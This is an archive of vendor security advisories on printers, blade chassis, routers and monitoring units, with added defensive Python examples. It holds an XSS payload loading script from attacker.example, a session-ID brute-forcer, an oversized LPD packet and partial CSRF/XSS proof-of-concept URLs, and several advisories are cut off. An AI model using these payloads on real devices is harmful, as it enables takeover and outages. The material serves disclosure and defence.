Xerox WorkCentre multiple models Denial of Service

2009-08-25 Thread Henri Lindberg - Smilehouse Oy
  Louhi Networks Information Security Research
   Security Advisory


 Advisory: Xerox WorkCentre multiple models Denial of Service
 Release Date: 2009/08/25
Last Modified: 2009/08/25
  Authors: Juho Ranta
   [juho.ra...@louhi.fi]
   Henri Lindberg, CISA
   [henri.lindb...@louhi.fi]

  Application: Xerox WorkCentre
 Verified: Controller+PS ROM Version 1.202.1 and 1.202.5
  Devices: Xerox WorkCentre 7132,
   WC7232/7242, WC7328/7335/7345/7346 and
   WC7425/28/35
  Attack type: Denial of Service
 Risk: Low
Vendor Status: Patch available for WC7232/7242
   References: http://www.louhinetworks.fi/advisory/xerox_0908.txt

http://www.cert.fi/haavoittuvuudet/2009/haavoittuvuus-2009-081.html

http://www.support.xerox.com/go/results.asp?Xtype=download&prodID=WC7232_WC7242&Xlang=en_US&Xcntry=USA


Overview

   Quote from http://www.xerox.com/
   "The Xerox WorkCentre 7132 multifunction is the affordable transition
to the next level of productivity for your office. One easy-to-use
device offers powerful printing, copying, scanning, and faxing. The
WorkCentre 7132 also gives you color when you need it, for critical
documents and for added impact. Robust functions, straightforward
operation, and color within your budget ... that should keep everyone
smiling and productive."

During a brief assessment performed on a Xerox WorkCentre 7132 it was
discovered that the LPD daemon implementation contains a weakness in
the robustness of its LPD protocol handling. An attacker can crash
the whole device with a relatively simple attack. Recovering from
the denial-of-service condition requires power cycling the device.

Details

The device freezes when it is flooded with LPD requests carrying
oversized queue names AND other features of the device are accessed
during the attack.

The LPD daemon terminates the connection when it receives a request
with an oversized queue name. The minimum length required for this
seems to vary. Our proof-of-concept attack sends blocks of ASCII
characters to the LPD daemon until the connection is closed, while at
the same time sending HTTP requests to the web administration interface.

By flooding the device with these invalid LPD requests and accessing
other features at the same time, the device can be crashed. This was
verified with two different firmware versions (1.202.1 and 1.202.5).

It must be noted that a successful denial-of-service attack requires
the steps described above: sending requests with oversized queue
names does not crash the device by itself.

Due to the black box nature of the attack, performed against a
production device, we were not able to determine the exact root
cause of the crash. According to the vendor it is caused by a memory
leak; further exploitability or memory corruption has neither been
confirmed nor denied.

The vulnerability was found with an LPD protocol definition written
for the Sulley Fuzzing Framework.


Preconditions

 *LPD daemon is enabled
 *Attacker has network access to the LPD daemon
 *Attacker has network access to other features OR
  a valid user uses the device on location


Symptoms of successful attack

One or more of the following:
 *Control panel lights are blinking, no response to pushing buttons
 *LCD panel displays error message
 *LCD panel displays a halted progress bar
 *Switching power off from on/off button takes more than 10 seconds

Proof of Concept:

Python code available at:
http://www.louhinetworks.fi/advisory/xerox/exploit.py
http://www.louhinetworks.fi/advisory/xerox/webInterface.py

Pictures of a crashed control panel (Finnish language):
http://www.louhinetworks.fi/advisory/xerox/error1.jpg
http://www.louhinetworks.fi/advisory/xerox/freeze1.jpg

Web interface requests are performed with a separate Python
process/script in order to achieve more reliable exploitation under
Windows.

Mitigation:

Preventive
 *Install patch from vendor
 *Configure IPS signature for LPD requests with oversized queue
  names
 *Allow only trusted users to access LPD daemon
 *Disable LPD daemon

Detective
 *Configure IDS signature for LPD requests with oversized queue
  names
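The IDS/IPS signature suggested above needs to understand the shape of an
LPD request: per RFC 1179 each daemon command is one command byte
(0x01-0x05), the queue name, optional space-separated operands and a
terminating LF. The following detector is an added example for this
advisory, not the authors' Sulley definition nor the Python PoC linked
above. The 64-byte queue-name limit, the sample packets, the source
addresses and the flood threshold are assumptions; the 4096-byte queue
name mirrors the oversized-request pattern described in Details.

```python
"""Detect LPD (RFC 1179) requests with oversized queue names and flag
sources that flood a printer with them.  Added example for this
advisory; the 64-byte limit, the sample packets and the addresses are
assumptions, not values from the advisory or the vendor."""
from collections import defaultdict
from typing import List, Optional, Tuple

# RFC 1179 daemon commands: one command byte, the queue name, then
# optional space-separated operands, terminated by LF.
LPD_COMMANDS = {
    0x01: "print-waiting-jobs",
    0x02: "receive-job",
    0x03: "queue-state-short",
    0x04: "queue-state-long",
    0x05: "remove-jobs",
}
MAX_QUEUE_NAME = 64  # assumed sane upper bound; tune to the deployed queue names


def inspect_lpd_request(payload: bytes,
                        max_queue: int = MAX_QUEUE_NAME) -> Tuple[str, int, Optional[str]]:
    """Return (command name, queue-name length, alert text or None) for one request."""
    if not payload:
        return "empty", 0, "empty request"
    name = LPD_COMMANDS.get(payload[0])
    if name is None:
        return "unknown", 0, "unknown command byte 0x%02x" % payload[0]
    body = payload[1:]
    end = body.find(b"\n")
    line = body if end < 0 else body[:end]
    queue = line.split(b" ", 1)[0]          # queue name ends at SPACE or LF
    if len(queue) > max_queue:
        return name, len(queue), "oversized queue name (%d bytes)" % len(queue)
    if not queue:
        return name, 0, "empty queue name"
    if end < 0:
        return name, len(queue), "command line not LF-terminated"
    return name, len(queue), None


def flooding_sources(events, threshold: int, window: float) -> List[str]:
    """events: iterable of (timestamp, source, payload), in time order.
    Return sources that sent more than `threshold` oversized-queue requests
    within any `window` seconds: the flood pattern from the advisory."""
    recent = defaultdict(list)
    flagged = []
    for ts, src, payload in events:
        _, _, alert = inspect_lpd_request(payload)
        if alert is None or not alert.startswith("oversized"):
            continue
        times = recent[src]
        times.append(ts)
        while times and ts - times[0] > window:   # slide the window forward
            times.pop(0)
        if len(times) > threshold and src not in flagged:
            flagged.append(src)
    return flagged


# Constructed sample traffic (not a capture from the device).
NORMAL = b"\x02lp\n"                       # receive a job for queue "lp"
OVERSIZED = b"\x02" + b"A" * 4096 + b"\n"  # oversized queue name, as the PoC sends
SAMPLE_EVENTS = (
    [(0.0, "10.0.0.5", NORMAL)]
    + [(0.1 * i, "10.0.0.9", OVERSIZED) for i in range(25)]
    + [(3.0, "10.0.0.5", b"\x03lp user1\n")]
)

if __name__ == "__main__":
    for _, src, pkt in SAMPLE_EVENTS[:2]:
        print(src, inspect_lpd_request(pkt))
    print("flooding:", flooding_sources(SAMPLE_EVENTS, threshold=10, window=5.0))
```

A single oversized request is worth an IDS alert on its own (it is never
legitimate traffic), but because the advisory's crash needs a sustained
flood plus concurrent use of the device, the per-source window count is
what justifies an IPS block rather than just a log line.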

Disclosure Timeline (selected dates):

   X 2008             - Vulnerability discovered
   3.  September 2008 - Contacted CERT-FI by email describing the
                        issue with Xerox WC 7132
   20. November  2008 - CERT-FI confirms vendor has been notified
   21. January   2009 - Vendor is unable to reproduce the issue,
                        but continues trying
   22. January   2009 - Vulnerability reproduced, vendor investigates
                        other devices and apologizes for the slow response
   17. June      2009 - Vendor has identified the vulnerability

IBM BladeCenter Advanced Management Module Multiple vulnerabilities

2009-04-09 Thread Henri Lindberg - Smilehouse Oy
   Louhi Networks Information Security Research
Security Advisory


 Advisory: IBM BladeCenter Advanced Management Module
   Multiple vulnerabilities
   (XSS type 2 & 1, CSRF, Information Disclosure)
 Release Date: 2009-04-09
Last Modified: 2009-04-09
  Authors: Henri Lindberg [henri.lindb...@louhi.fi], CISA

   Device: IBM BladeCenter H AMM
   Main application: BPET36H
   Released: 03-20-08
   Rev:  54
 Risk: Low - Moderate
   High if Web Access is in active use and
   access to login page is unrestricted
Vendor Status: Vendor notified, patch available.
   References: http://www.louhinetworks.fi/advisory/ibm_090409.txt

Affected devices (from vendor):
  IBM BladeCenter E (1881, 7967, 8677)
  IBM BladeCenter H (7989, 8852)
  IBM BladeCenter HT (8740, 8750)
  IBM BladeCenter S (1948, 8886)
  IBM BladeCenter T (8720, 8730)
  IBM BladeCenter JS12 (7998)
  IBM BladeCenter JS21 (7988, 8844)
  IBM BladeCenter JS22 (7998)
  IBM BladeCenter HC10 (7996)
  IBM BladeCenter HS12 (8014, 1916, 8028)
  IBM BladeCenter HS20 (1883, 8843)
  IBM BladeCenter HS21 (8853, 1885)
  IBM BladeCenter HS21 XM (7995, 1915)
  IBM BladeCenter LS20 (8850)
  IBM BladeCenter LS21 (7971)
  IBM BladeCenter LS41 (7972)
  IBM BladeCenter QS21 (0792)
  IBM BladeCenter QS22 (0793)

Overview:

   Quotes from

http://www-03.ibm.com/systems/bladecenter/hardware/chassis/bladeh/index.html

   "In today’s high-demand enterprise environment, organizations
need a reliable infrastructure to run compute-intensive
applications with minimal maintenance and downtime.
IBM BladeCenter H is a powerful platform built with the
enterprise customer in mind, providing industry-leading performance,
innovative architecture and a solid foundation for virtualization."

   "Provides easy integration to promote innovation and help manage
growth, complexity and risk"

   During a quick overview of the BladeCenter AMM web access it was
   discovered that the web administration interface has multiple
   vulnerabilities regarding input and request validation.

Details:

   Cross Site Scripting
   ==

   Type 2:
   ---
   The most serious issue discovered was a persistent XSS
   vulnerability on the event log page, resulting from
   displaying unsanitised user input received from an invalid
   login attempt.

   This can be exploited without valid credentials or social
   engineering. Access to the device administration IP address is
   needed, and an administrator has to view the event log at some
   point, however.

   A successful attack requires that an administrator visits the event
   log page, thus enabling the attacker to control the chassis
   and blade configuration by running the injected content, which
   is interpreted by the administrator's browser.

   For example, all blades can be shut down or new administrative
   users can be added, depending on the administrator's access rights.

   Unsuccessful login attempts are displayed in the event log without
   HTML encoding or input sanitisation. It is possible to inject
   a reference to a remote JavaScript file by using e.g. the following
   username:
   

   Notes:
   If user input contains , dynamic javascript is spilled
   out on the page and it is quite easy to mess up formatting
   of the event log page.

   Log can be cleared by an authenticated administrator from URL:
   http://1.2.3.4/private/clearlog

   Event log javascript format:
   parent.LogEntryArray[i++] = new LogEntry( "1","2","Audit
   ","SN#420420313370","09/09/08","04:20:42","Remote login failed
   for user '' from
   Web at IP 1.2.3.4");

   HTML-injection can be performed for example with following
   "username": Mallory

   This results in:
   Remote login failed for user '
   Mallory' from Web at IP 1.2.3.4

   Entries from event log are also displayed on the AMM Service
   Data page.
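   The event log line shown above embeds the failed-login username
   inside a JavaScript string literal that itself sits in an inline
   script, so the value crosses two contexts (JS string, then HTML once
   LogEntry renders it) and must be encoded for both. The following is an
   added example for this advisory, not IBM's AMM code: the builder
   functions, the placeholder host attacker.example and the use of the
   serial number and date from the sample line above are assumptions.

```python
"""Build the AMM-style event-log JavaScript line with and without output
encoding.  Added example for this advisory; the builders, the attacker
host and the serial/date values are assumptions (the line shape follows
the 'Event log javascript format' quoted in the advisory)."""
import html
import json


def failed_login_message(username: str, ip: str) -> str:
    return "Remote login failed for user '%s' from Web at IP %s" % (username, ip)


def log_entry_vulnerable(username: str, ip: str) -> str:
    """Interpolate the raw username into a JS string literal inside an
    inline script: a username containing </script> terminates the script
    block and whatever follows is parsed as HTML by the admin's browser."""
    msg = failed_login_message(username, ip)
    return ('parent.LogEntryArray[i++] = new LogEntry("1","2","Audit ",'
            '"SN#420420313370","09/09/08","04:20:42","%s");' % msg)


def js_string_literal(value: str) -> str:
    """Encode for a JS string literal that lives inside an HTML <script>.
    json.dumps handles quotes, backslashes and control characters (and,
    with ensure_ascii, U+2028/2029); '</' is escaped on top so the HTML
    parser can never see a closing </script> tag inside the literal."""
    return json.dumps(value).replace("</", "<\\/")


def log_entry_hardened(username: str, ip: str) -> str:
    """Encode for both contexts the value passes through: HTML-escape first
    (LogEntry renders the text into the page), then JS-string-escape the
    whole message for the script context it is embedded in."""
    msg = failed_login_message(html.escape(username, quote=True), ip)
    return ('parent.LogEntryArray[i++] = new LogEntry("1","2","Audit ",'
            '"SN#420420313370","09/09/08","04:20:42",%s);' % js_string_literal(msg))


def script_breakout(line: str) -> bool:
    """True if the generated line would terminate the enclosing <script>."""
    return "</script" in line.lower()


# Constructed attacker "username"; attacker.example is a placeholder host.
PAYLOAD = '</script><script src="http://attacker.example/x.js"></script>'

if __name__ == "__main__":
    print(log_entry_vulnerable(PAYLOAD, "1.2.3.4"))
    print(log_entry_hardened(PAYLOAD, "1.2.3.4"))
```

   Note that escaping only the double quote (the obvious fix for a
   string literal) would not be enough: the payload above contains no
   quote that the JS context cares about, it simply closes the script
   element. The HTML pass is what turns the injected tags into text in
   the rendered log.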

   Type 1:
   ---
   The file manager displays user input on the page "as is".

   Successful exploitation requires social-engineering an
   authenticated administrator into visiting the hostile URL.

   Example URL:
   http://1.2.3.4/private/file_management.ssi?
   PATH=/etc">http://l7.fi";>

   Information Disclosure
   ==

   A read-only operator (for example, a Blade operator with
   a scope assignment to one Blade) can view the security
   permissions of other users (access roles and scopes) by
   forcefully browsing to their respective login profile pages:

   http://1.2.3.4/private/login.ssi?WEBINDEX=&JUNK=1
   where the WEBINDEX value is the assigned integer index (1..12)
   of the user account

   Cross Site Request Forgery
   ==

   BladeCenter AMM does not validate the origin of an HTTP

Rittal CMC-TC Processing Unit II multiple vulnerabilities

2009-03-23 Thread Henri Lindberg - Smilehouse Oy
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

  Louhi Networks Oy
   -= Security Advisory =-


  Advisory: Rittal CMC-TC Processing Unit II
multiple vulnerabilities
  Release Date: 2009-03-23
 Last Modified: 2009-03-22
   Authors: Henri Lindberg, CISA
[henri d0t lindberg at louhi d0t fi]

   Application: Rittal CMC-TC PU II Web management

   Devices: CMC-TC PU II DK 7320.100 SW: V2.45 HW: V3.01,
possibly other Rittal products

  Attack type : XSS Type I, XSS Type II, Session prediction,
Remote command execution in default configuration
  Severity: Moderate
 Vendor Status: Vendor notified.
Patch already available for XSS vulnerabilities.
Other vulnerabilities will be addressed in a future
version, no release date set.
References: http://www.louhinetworks.fi/advisory/Rittal_090323.txt


Overview:
   Quote from http://www.rimatrix5.com/ :
   "The Computer Multi Control Top-Concept (CMC-TC) from Rittal is
a complete security management for preventive protection to guard
against consequential costs, and is the central organisational unit
for linking to the facility management.
...
Processing Unit II (PU II) the nerve centre of the CMC-TC monitoring
system. The PU II is the coordinator between the sensor unit and the
network. It is configured via the integral Web server."

Details:

Several vulnerabilities were identified from CMC-TC PU II web
interface. These include XSS Type I, XSS Type II, weak session
management and insecure default configuration.

XSS Type 1:
---
The web application fails to validate and/or HTML-encode user input when
handling erroneous requests. This allows an attacker to inject HTML and
client-side scripts into the victim's browser by crafting suitable links.

This vulnerability cannot be used for session hijacking, because
CMC-TC PU II requires each valid request to contain current session
ID as URL parameter. Requests without session ID are redirected to
the login page. Therefore only phishing-type attacks or attacks
against user's browser are possible.

Successful exploitation requires that attacker can lure or force
the user to follow the malicious link.

XSS Type 2:
---
The web application fails to sanitize and/or HTML-encode user input on
the system information page. This allows an attacker to backdoor the
device with HTML and browser-interpreted content (such as ECMAScript
dialects or other client-side scripts), as the content is always
displayed after login. Persistent XSS allows the attacker to modify the
displayed content or to change the victim's password (since the old
password is not required for password changes).

Successful exploitation requires access to the web management
interface, either with valid credentials or a hijacked session.

Weak session management:

CMC-TC PU II uses the Unix time of the login moment as the session
identifier, which leaves the identifier with essentially no randomness.

If administrator login time is known and session is still valid, it
can be brute-forced with relatively little effort. Proof-of-concept
tool is provided, but any web application security tool (such as
Burp Intruder) can be used for this.

Successful exploitation requires that the administrator's login time is
known (or a reasonably accurate guess can be made) and the session
is still active.
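Why "relatively little effort" follows directly from the identifier's
construction: once the login time is known to within some window, the
candidate space is one value per second in that window. The following is
an added example for this advisory, not the authors' proof-of-concept
tool: the simulated device, the one-hour session lifetime, the two-hour
search window and the login timestamp are assumptions.

```python
"""Brute-force a Unix-time session identifier around an estimated login
time and contrast the search space with a random token.  Added example
for this advisory; the simulated device, the window and the timestamps
are assumptions, not the advisory's proof-of-concept tool."""
import math
import secrets
from typing import Callable, Optional, Tuple


class SimulatedDevice:
    """Stand-in for a device that uses the login Unix time as the session ID."""

    def __init__(self, login_time: int, lifetime: int = 3600) -> None:
        self.session_id = str(login_time)
        self.expires = login_time + lifetime
        self.attempts = 0

    def is_valid(self, session_id: str, now: int) -> bool:
        self.attempts += 1
        return now < self.expires and secrets.compare_digest(session_id, self.session_id)


def brute_force_session(check: Callable[[str], bool], estimated_login: int,
                        window: int) -> Tuple[Optional[str], int]:
    """Try every second within +/-window of the estimate, nearest first
    (the estimate is usually closer than the window edge).  Returns
    (recovered session id or None, number of candidates tried)."""
    tried = 0
    for delta in range(window + 1):
        for candidate in {estimated_login + delta, estimated_login - delta}:
            tried += 1
            if check(str(candidate)):
                return str(candidate), tried
    return None, tried


def search_space_bits(window: int) -> float:
    """Entropy of a unixtime session ID once the login is known to +/-window seconds."""
    return math.log2(2 * window + 1)


def random_session_id(nbytes: int = 16) -> str:
    """What the device should issue instead: 128 bits from the OS CSPRNG."""
    return secrets.token_hex(nbytes)


LOGIN_AT = 1237766400          # constructed: an administrator login instant
ESTIMATE = LOGIN_AT + 900      # attacker's guess, 15 minutes off
NOW = LOGIN_AT + 1800          # attack runs while the session is still valid
WINDOW = 2 * 3600              # attacker assumes "sometime in the last two hours"

if __name__ == "__main__":
    dev = SimulatedDevice(LOGIN_AT)
    sid, tried = brute_force_session(lambda s: dev.is_valid(s, NOW), ESTIMATE, WINDOW)
    print("recovered", sid, "after", tried, "requests")
    print("unixtime ID: %.1f bits; random ID: %d bits" % (search_space_bits(WINDOW), 8 * 16))
    print("random example:", random_session_id())
```

A two-hour window is under 14 bits, i.e. at most 14401 HTTP requests,
which any intruder-style tool (Burp Intruder, as the advisory notes)
gets through in minutes; a 128-bit random identifier is out of reach by
a factor of 2^114. The lifetime check in the simulated device is what
enforces the advisory's second precondition, that the session is still
active.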

Insecure default configuration:
---
If the default administrator password is not changed, an attacker can
run arbitrary commands and modify the system software by uploading
malicious update scripts via FTP. See the update packet script
contents for detailed information about the update process (e.g.
update_l.sh).

The software update packet expects the user to have the default
password in place, since the FTP upload script contains the hardcoded
default password. The update fails without any error if the password
has been changed.

What makes this interesting is that the device does not offer
operating-system-level access through any of the other management
interfaces: Telnet and SSH both present a menu-based administration
interface.

Successful exploitation requires the default administrator password
and access to the FTP port of the target device.

Remediation:
   * Restrict unauthorized network access to device
   * Change default passwords (instructions provided in Operation
 Manual)
   * Install patched Version 2.60a
   * Update future patch version as soon as available
   * Configure web interface to 'view only'
   * Review device configuration after an administrator has been let go
   * Do not follow untrusted links

Timeline:
   * 2008-xx-xx Issues discovered

   * 2009-02-25 Contacted vendor via e-mail

   * 2009-03-02 C

A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability

2008-11-03 Thread Henri Lindberg - Smilehouse Oy
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

   Louhi Networks Information Security Research
Security Advisory


 Advisory: A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability
 Release Date: 2008/10/31
Last Modified: 2008/10/28
  Authors: Jussi Vuokko, CISSP [EMAIL PROTECTED]
   Henri Lindberg [EMAIL PROTECTED]

   Device: A-Link WL54AP3 and WL54AP2 (any firmware)
 Severity: CSRF and XSS in management interface
 Risk: Moderate
Vendor Status: Vendor has released an updated version
   References: http://www.louhinetworks.fi/advisory/alink_081028.txt


Overview:

   Quote from http://www.a-link.com/
   "WLAN Access point 54MB, 4-port
Wlan Access point, wireless 54Mbps, DSSS, 802.11g-standard based and
it's compatible also with other manufacturers cards."

   During an audit of the A-Link WLAN54AP3 it was discovered that a cross
   site request forgery vulnerability exists in the management
   interface. It is possible for an attacker to perform any
   administrative action in the management interface if the victim
   can be lured or forced to view malicious content. These administrative
   actions include e.g. changing the admin user's username and password,
   DNS settings, etc.

   In addition, it was discovered that no input validation or output
   encoding is performed in the management interface, making it
   vulnerable to cross-site scripting.

   By default the admin password is blank and no authentication is
   performed for requests to the administrative interface. As ordinary
   consumers usually use out-of-the-box settings, this vulnerability
   offers the same kind of phishing possibilities as were used in the
   Banamex attacks[1].

   A-Link WLAN54AP2 (EOL) is vulnerable to this threat as well.

   [1] http://www.google.fi/search?q=banamex+phishing+dns+poison


Details:

   The A-Link WLAN54AP3 does not validate the origin of an HTTP request.
   If the attacker is able to make the user view malicious content, the
   WLAN54AP3 device can be controlled by submitting suitable forms. The
   attacker is effectively acting as an administrator.

   A successful attack requires that the attacker knows the management
   interface address of the target device (the default IP address is
   192.168.1.254). As the management interface has no logout
   functionality, the user can remain vulnerable to this attack even
   after closing the tab containing the management interface (if the
   user does not close the browser window or clear cookies, depending
   on browser behaviour), and whenever the default blank password is in
   use.


Proof of Concept:

   CSRF:

   Example form (changes DNS servers, enables WAN web server access
   and changes user's username and password):

   http://192.168.1.254/goform/formWanTcpipSetup"
   method="post" name="wan">

   http://192.168.1.254/goform/formPasswordSetup"
   method="post" name="password">

   XSS:

   Add following content to management interface's Management - DDNS -
   Domain Name:

   "">http://l7.fi">

Solution:

   More information:
   http://en.wikipedia.org/wiki/Cross-site_request_forgery

   Perform input validation and/or output encoding. More information:
   http://en.wikipedia.org/wiki/Cross_site_scripting

  Use secure out-of-the-box configuration (for example generate
  default passwords based on device serial or MAC address using
  a secure cryptographic algorithm).


Disclosure Timeline:

   13. September 2008 - Contacted A-Link by email
   28. October 2008   - Vendor released an updated version
   31. October 2008   - Advisory was released


Copyright 2008 Louhi Networks Oy. All rights reserved.
-BEGIN PGP SIGNATURE-

iEYEAREIAAYFAkkLDf0ACgkQ3TZNEGeZkm677QCdGIBR9jySnDlKCmtN7eDMUEGM
y6sAn26m+4S2I50fuDFxBlaQTO6kqSTK
=XEbb
-END PGP SIGNATURE-


Checkpoint VPN-1 UTM Edge cross-site scripting

2008-03-06 Thread Henri Lindberg - Smilehouse Oy

  Louhi Networks
 Security Advisory


 Advisory: Checkpoint VPN-1 UTM Edge cross-site scripting
 Release Date: 2008/03/06
Last Modified: 2008/03/06
  Authors: Henri Lindberg, Associate of (ISC)²
   [EMAIL PROTECTED]

  Application: Checkpoint VPN-1 Edge W Embedded NGX 7.0.48x
   (patched in version 7.5.48)
  Devices: Checkpoint VPN-1 UTM Edge
  Attack type: Cross site scripting (non-persistent)
 Risk: Low
Vendor Status: Vendor has released an updated version
   References: http://www.louhi.fi/advisory/checkpoint_080306.txt


Overview:

   Quote from http://www.checkpoint.com/
   "VPN-1 UTM Edge appliances deliver unified threat management to
enterprises with branch offices and simplify security deployments
and manageability. VPN-1 UTM Edge appliances consolidate proven
enterprise-class technology into a single branch office solution
that does not compromise the corporate network and eliminates the
branch office as your weakest link. As part of Check Point's Unified
Security Architecture, VPN-1 UTM Edge can enforce a global security
policy and allows administrators to manage and update thousands of
appliances as easily as managing one."

   Insufficient input validation and output encoding on the login page
   allow an attacker to perform HTML injection by posting a suitable
   string to the login form handler. The injection leads to reflected
   pre-authentication cross site scripting.


Details:
   Form based authentication is used only when device is accessed using
   HTTP. Authentication over HTTPS uses HTTP basic authentication.

   The device does not accept the parameters in a GET request, POST
   request has to be used instead - exploiting the XSS vulnerability
   requires therefore a bit more effort compared to ordinary GET based
   reflected cross site scripting vulnerability.

   The current version can be checked from
   http://xxx.xxx.xxx.xxx/pub/test.html where xxx.xxx.xxx.xxx is LAN IP
   address of the device. The page also displays current product key.

Vendor response:

   "Once users register the appliance and connect to the service center
   ([EMAIL PROTECTED] appliances), the latest firmware is automatically
   downloaded to their appliance. For UTM-1 Edge appliances, the latest
   firmware version can be downloaded from the Check Point download
   center. Currently, this is version 7.5.48 that does not contain the
   reported issue. We believe that customers are not exposed to this
   issue."

Proof of Concept:

   http://192.168.10.1"
   style="display:none">

Solution:

   Update to version 7.5.48


Disclosure Timeline:

   19.  February 2008- Contacted Checkpoint by email
   20.  February 2008- Vendor response.
   6.  March 2008- Advisory was released

Copyright 2008 Louhi Networks Oy. All rights reserved.


Buffalo AirStation WHR-G54S CSRF vulnerability

2007-09-07 Thread Henri Lindberg - Smilehouse Oy
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

  Louhi Networks Oy
   -= Security Advisory =-


  Advisory: Buffalo AirStation WHR-G54S Web Management CSRF
vulnerability
  Release Date: 2007-09-07
 Last Modified: 2007-09-07
   Authors: Henri Lindberg, Associate of (ISC)²
[henri d0t lindberg at louhi d0t fi]

   Application: Buffalo AirStation Web Management

   Devices: WHR-G54S Ver.1.20, possibly other Buffalo products
  Severity: Cross site request forgery in management interface
  Risk: Moderate
 Vendor Status: No response from vendor.
References: http://www.louhi.fi/advisory/buffalo_070907.txt


Overview:

During a cursory inspection of the WHR-G54S it was discovered that a
cross site request forgery vulnerability exists in the management
interface. Thus, it is possible for an attacker to perform any
administrative action in the management interface. These include
e.g. changing the administrative password or adding new firewall rules.


Details:

The Buffalo AirStation WHR-G54S Ver.1.20 device management interface
does not validate the origin of an HTTP request. If the attacker is
able to make the user visit a hostile web page, the device can be
controlled by submitting suitable forms. It is possible to add new
users, for example.

A successful attack requires that the attacker knows the management
interface address of the target device. As authentication is done
using HTTP Basic authentication, exploiting this vulnerability
requires more effort compared to forms authentication.


Proof of Concept:

   http://192.168.11.1/cgi-bin/cgi?req=inp&res=ap.html"
   style="display:none">

Note: ropass value is reversed edit_ropass value.

   http://192.168.11.1/cgi-bin/cgi?req=inp&res=filter_ip.html"
   style="display:none">

1.1.1.1 = attacker's IP address


Workaround:

Do not browse untrusted websites while using the management
interface.

Log out after administering the device.

More information

http://en.wikipedia.org/wiki/Cross-site_request_forgery

Disclosure Timeline:

XX  July 2007   - Discovered the issue
15. August 2007 - Contacted Buffalo
17. August 2007 - Contacted Buffalo again.
7.  September 2007  - No response from Vendor.
7.  September 2007  - Advisory released


Copyright 2007 Louhi Networks Oy. All rights reserved.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (MingW32)

iEYEAREIAAYFAkbhNJIACgkQ3TZNEGeZkm50SACcCHiOtcfCycfYcxr3lsQPh/J3
Aa8AoKVr6BmKMamG3a7mQCAvO0FV+6y6
=+E8f
-END PGP SIGNATURE-


Zyxel Zywall 2 multiple vulnerabilities

2007-08-10 Thread Henri Lindberg - Smilehouse Oy
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

 Louhi Networks Oy
  -= Security Advisory =-


 Advisory: Zyxel Zywall 2 Multiple vulnerabilities
 Release Date: 2007-08-10
Last Modified: 2007-08-10
  Authors: Henri Lindberg, Associate of (ISC)²
   [EMAIL PROTECTED]

  Application: ZyNOS Firmware Version: V3.62(WK.6) | 06/16/2004
  Devices: Zyxel Zywall2 (possibly all other Zyxel devices using
   the same firmware)
 Severity: Moderate
   Impact: Persistent cross site scripting, cross site request
   forgery, persistent denial of service
Vendor Status: Vendor notified
   References: http://www.louhi.fi/advisory/zyxel_070810.txt


Overview:

   During an audit of the Zyxel Zywall 2 it was discovered that cross
   site request forgery and persistent cross site scripting
   vulnerabilities exist in the management interface. Thus, it is
   possible for an attacker to perform any administrative action in
   the management interface if a logged-in/authenticated user has been
   enticed to visit a malicious web site. These actions include e.g.
   changing the DNS server address or other security critical
   configuration items.

   It was also discovered that it is possible to "brick" the device by
   submitting an invalid configuration to it, thus performing a
   persistent denial of service attack against it.

Details:

   The embedded device management interface does not validate the origin
   of an HTTP request. If the attacker is able to make an authenticated
   user visit a hostile web page, the device can be controlled by
   submitting suitable forms. It is possible to steal information from
   the device and modify the configuration. See the provided
   proof-of-concept code for more information.

   A successful attack requires that the attacker knows the management
   interface address of the target device. As the management interface
   is usually located at the default IP address and might even have the
   default password in place, a successful attack is not far fetched.

   By submitting an invalid configuration to the management interface it
   is possible to perform a persistent denial of service attack against
   the device. After receiving the invalid configuration, the device
   reboots and enters an infinite reboot loop. Powering off the device
   or pressing the reset button does not help. It has not been researched
   whether the device can be restored from this state (it has no reset
   jumpers or battery backed memory). From an ordinary consumer's point
   of view, the device is completely useless. No proof-of-concept code
   will be released, but finding this vulnerability is trivial.

More information:
   http://en.wikipedia.org/wiki/Cross-site_request_forgery
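   The same request-origin weakness is reported here, in the A-Link and
   in the Buffalo advisories: the firmware applies any well-formed POST
   the browser delivers, so a hostile page can submit the configuration
   forms on the victim's behalf. What the management interface should
   do instead, as an added example for those three findings and not
   firmware code from any of the vendors: bind a synchronizer token to
   the session (an attacker's page cannot read it, so it cannot forge the
   form) and refuse state-changing requests whose Origin/Referer names
   another host. The handler, the field names, the per-device secret and
   the placeholder site evil.example are assumptions; 192.168.1.1 is the
   default address used in the proof-of-concept form below.

```python
"""Server-side CSRF defence for an embedded management interface: an
HMAC-bound per-session synchronizer token plus an Origin/Referer check.
Added example for the A-Link, Buffalo and Zyxel CSRF findings; the
handler, field names and secret are assumptions, not vendor code."""
import hashlib
import hmac
import secrets
from typing import Dict, Tuple
from urllib.parse import urlsplit

# Assumed: a per-device secret generated at first boot and kept in flash.
DEVICE_SECRET = secrets.token_bytes(32)
MANAGEMENT_HOST = "192.168.1.1"   # the default management address in the PoC


def issue_csrf_token(session_id: str) -> str:
    """Token = HMAC(secret, session id), emitted into a hidden form field of
    every configuration form the device serves to this session."""
    return hmac.new(DEVICE_SECRET, b"csrf:" + session_id.encode(), hashlib.sha256).hexdigest()


def token_is_valid(session_id: str, token: str) -> bool:
    return hmac.compare_digest(issue_csrf_token(session_id), token)


def request_is_same_origin(headers: Dict[str, str], expected_host: str) -> bool:
    """Reject when Origin (or, failing that, Referer) names another host.
    Absence of both is treated as untrusted for state-changing requests."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return urlsplit(source).netloc == expected_host


def handle_config_post(session_id: str, headers: Dict[str, str],
                       form: Dict[str, str]) -> Tuple[int, str]:
    """State-changing handler (e.g. the DNS/WAN setup form): both checks must pass."""
    if not request_is_same_origin(headers, MANAGEMENT_HOST):
        return 403, "cross-origin request refused"
    if not token_is_valid(session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    return 200, "configuration applied: dns1=%s" % form.get("dns1", "")


# Constructed requests.  The victim is logged in (session "s1") in all cases.
VICTIM_SESSION = "s1"
LEGIT_REQUEST = (
    {"Origin": "http://192.168.1.1"},
    {"dns1": "192.168.1.1", "csrf_token": issue_csrf_token(VICTIM_SESSION)},
)
FORGED_REQUEST = (
    {"Referer": "http://evil.example/page.html"},   # placeholder attacker site
    {"dns1": "1.1.1.1"},                             # attacker-chosen DNS server
)
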